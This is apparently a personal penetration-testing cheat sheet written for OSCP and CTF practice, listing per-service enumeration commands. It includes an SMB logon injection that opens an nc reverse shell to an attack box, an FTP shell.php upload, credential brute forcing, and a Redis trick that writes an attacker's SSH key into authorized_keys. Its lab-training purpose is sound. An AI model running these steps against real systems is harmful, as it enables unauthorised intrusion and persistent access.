Disclaimer: These notes are not in the context of any machines I had during the OSCP lab or exam. This is purely my experience with CTFs, Tryhackme, Vulnhub, and Hackthebox prior to enrolling in OSCP. This is an approach I came up with while researching on offensive security. It contains contents from other blogs for my quick reference

Port Scanning :

nmap -sC -sV -o nmap -A -T5 10.10.10.x
Host Discovery
• nmap -sn -vv -oA hosts
• netdiscover -r
DNS server discovery
• nmap -p 53 -vv -oA dcs
NSE Scripts Scan
* nmap -sV --script=vulscan/vulscan.nse (https://securitytrails.com/blog/nmap-vulnerability-scan)
Port specific NSE script list :
ls /usr/share/nmap/scripts/ssh*
ls /usr/share/nmap/scripts/smb*

Scanning all 65535 ports :

masscan -p1-65535,U:1-65535 --rate=1000 10.10.10.x -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
nmap -Pn -sV -sC -p$ports 10.10.10.x
Running specific NSE scripts :
nmap -Pn -sC -sV --script=vuln*.nse -p$ports 10.10.10.x -T5 -A

sC - default scripts, sV - scan for versions, oA- output all formats

Optional - sT (performs full scan instead of syn-scan to prevent getting flagged by firewalls)

From Apache Version to finding Ubuntu version -> ubuntu httpd versions

FTP : (Port 21)

  • anonymous login check

    • ftp <ip address>

    • username : anonymous

    • pwd : anonymous

    • file upload -> put shell.php

SSH : (Port 22)

id_rsa.pub : Public key that can be used in authorized_keys for login

id_rsa : Private key that is used for login. Might ask for password. can be cracked with ssh2john and john

  • id_rsa

  • ssh -i id_rsa [email protected]

  • For passwordless login, add id_rsa.pub to target's authorized_keys

  • ssh2john

DNS Zone transfer check : (Port 53)

RPC Bind (111)

rpcclient --user="" --command=enumprivs -N
rpcinfo –p
rpcbind -p

RPC (135)

rpcdump.py -p 135
rpcdump.py -p 135 | grep ncacn_np // get pipe names
rpcmap.py ncacn_ip_tcp:[135]

SMB (139 & 445)


nmap --script smb-protocols
smbclient -L //
smbclient -L // -N // No password (SMB Null session)
smbclient --no-pass -L
smbclient //
smbmap -H
smbmap -H -u '' -p ''
smbmap -H -s share_name
crackmapexec smb -u '' -p '' --shares
crackmapexec smb -u 'sa' -p '' --shares
crackmapexec smb -u 'sa' -p 'sa' --shares
crackmapexec smb -u '' -p '' --share share_name
crackmapexec smb -u '' -p '' --shares --pass-pol
enum4linux -a
rpcclient -U ""
* enumdomusers
* enumdomgroups
* queryuser [rid]
* getdompwinfo
* getusrdompwinfo [rid]
ncrack -u username -P rockyou.txt -T 5 -p smb -v
mount -t cifs "//" /mnt/wins
mount -t cifs "//" /mnt/wins -o vers=1.0,user=root,uid=0,gid=0
SMB Shell to Reverse Shell :
smbclient -U "username%password" //
smb> logon “/=nc ‘attack box ip’ 4444 -e /bin/bash"
Checklist :
* Samba symlink directory traversal attack

SMB Exploits :

SNMP (161)

  • snmpwalk -c public -v1
    snmpcheck -t 192.168.1.X -c public
    onesixtyone -c names -i hosts
    nmap -sT -p 161 192.168.X.X -oG snmp_results.txt
    snmpenum -t 192.168.1.X

IRC (194,6667,6660-7000)

NFS (2049)

MYSQL (3306)

  • nmap -sV -Pn -vv -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122

Redis (6379)

In the output of config get * you could find the home of the redis user (usually /var/lib/redis or /home/redis/.ssh), and knowing this you know where you can write the authenticated_users file to access via ssh with the user redis. If you know the home of other valid user where you have writable permissions you can also abuse it:

  1. Generate a ssh public-private key pair on your pc: ssh-keygen -t rsa

  2. Write the public key to a file : (echo -e "\n\n"; cat ./.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt

  3. Import the file into redis : cat foo.txt | redis-cli -h -x set crackit

  4. Save the public key to the authorized_keys file on redis server:

[email protected]:~# redis-cli -h> config set dir /home/test/.ssh/
OK> config set dbfilename "authorized_keys"
OK> save

Port Knocking :

knock -v 4 27391 159
knock -v 4 27391 159 -u
knock -v 159:udp 27391:tcp 4:udp

Misc :